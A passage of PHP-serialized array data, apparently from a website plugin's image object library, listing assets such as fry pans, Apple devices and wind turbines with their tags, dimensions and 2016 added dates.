Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:45;a:12:{s:2:\"id\";s:3:\"130\";s:6:\"handle\";s:19:\"object_frypan_2.png\";s:4:\"name\";s:9:\"Fry Pan 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:46;a:12:{s:2:\"id\";s:3:\"129\";s:6:\"handle\";s:19:\"object_frypan_1.png\";s:4:\"name\";s:9:\"Fry Pan 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:47;a:12:{s:2:\"id\";s:3:\"128\";s:6:\"handle\";s:17:\"object_fork_1.png\";s:4:\"name\";s:4:\"Fork\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:48;a:12:{s:2:\"id\";s:3:\"127\";s:6:\"handle\";s:20:\"object_dishrag_1.png\";s:4:\"name\";s:13:\"Dishrag Cloth\";s:4:\"tags\";a:0:{}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:49;a:12:{s:2:\"id\";s:3:\"126\";s:6:\"handle\";s:20:\"object_wacom_pen.png\";s:4:\"name\";s:17:\"Wacom Drawing Pen\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1060\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:50;a:12:{s:2:\"id\";s:3:\"125\";s:6:\"handle\";s:21:\"object_occulus_vr.png\";s:4:\"name\";s:23:\"Occulus Virtual Reality\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:51;a:12:{s:2:\"id\";s:3:\"124\";s:6:\"handle\";s:18:\"object_antenna.png\";s:4:\"name\";s:13:\"Antenna Radar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:52;a:12:{s:2:\"id\";s:3:\"123\";s:6:\"handle\";s:21:\"object_solarpanel.png\";s:4:\"name\";s:11:\"Solar Panel\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:53;a:12:{s:2:\"id\";s:3:\"122\";s:6:\"handle\";s:16:\"object_wacom.png\";s:4:\"name\";s:20:\"Wacom Drawing Tablet\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:54;a:12:{s:2:\"id\";s:3:\"121\";s:6:\"handle\";s:18:\"object_earth_2.png\";s:4:\"name\";s:20:\"Earth Globe Planet 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:55;a:12:{s:2:\"id\";s:3:\"120\";s:6:\"handle\";s:18:\"object_chair_1.png\";s:4:\"name\";s:12:\"Office Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:56;a:12:{s:2:\"id\";s:3:\"119\";s:6:\"handle\";s:24:\"object_windturbine_2.png\";s:4:\"name\";s:14:\"Wind Turbine 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:57;a:12:{s:2:\"id\";s:3:\"118\";s:6:\"handle\";s:22:\"object_windturbine.png\";s:4:\"name\";s:12:\"Wind Turbine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:58;a:12:{s:2:\"id\";s:3:\"117\";s:6:\"handle\";s:16:\"object_earth.png\";s:4:\"name\";s:18:\"Earth Globe Planet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:59;a:12:{s:2:\"id\";s:2:\"88\";s:6:\"handle\";s:24:\"object_eiffeltower_2.png\";s:4:\"name\";s:13:\"Eiffeltower 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:60;a:12:{s:2:\"id\";s:2:\"87\";s:6:\"handle\";s:21:\"object_notebook_1.png\";s:4:\"name\";s:11:\"Notebook PC\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:61;a:12:{s:2:\"id\";s:2:\"86\";s:6:\"handle\";s:20:\"object_macbook_1.png\";s:4:\"name\";s:20:\"Apple Macbook Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:62;a:12:{s:2:\"id\";s:2:\"85\";s:6:\"handle\";s:18:\"object_canon_2.png\";s:4:\"name\";s:21:\"Canon Camera DSLR Top\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:63;a:12:{s:2:\"id\";s:2:\"84\";s:6:\"handle\";s:19:\"object_iphone_3.png\";s:4:\"name\";s:25:\"Apple iPhone Silver White\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:64;a:12:{s:2:\"id\";s:2:\"83\";s:6:\"handle\";s:18:\"object_candy_2.png\";s:4:\"name\";s:15:\"Candy Colored 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:65;a:12:{s:2:\"id\";s:2:\"82\";s:6:\"handle\";s:21:\"object_macmouse_1.png\";s:4:\"name\";s:15:\"Apple Mac Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:66;a:12:{s:2:\"id\";s:2:\"81\";s:6:\"handle\";s:19:\"object_iphone_1.png\";s:4:\"name\";s:18:\"Apple iPhone Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:67;a:12:{s:2:\"id\";s:2:\"80\";s:6:\"handle\";s:17:\"object_deco_1.png\";s:4:\"name\";s:17:\"White Deco Object\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:68;a:12:{s:2:\"id\";s:2:\"79\";s:6:\"handle\";s:23:\"object_applewatch_1.png\";s:4:\"name\";s:24:\"Apple Watch White Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:69;a:12:{s:2:\"id\";s:2:\"78\";s:6:\"handle\";s:23:\"object_swissknife_1.png\";s:4:\"name\";s:11:\"Swiss Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:70;a:12:{s:2:\"id\";s:2:\"77\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 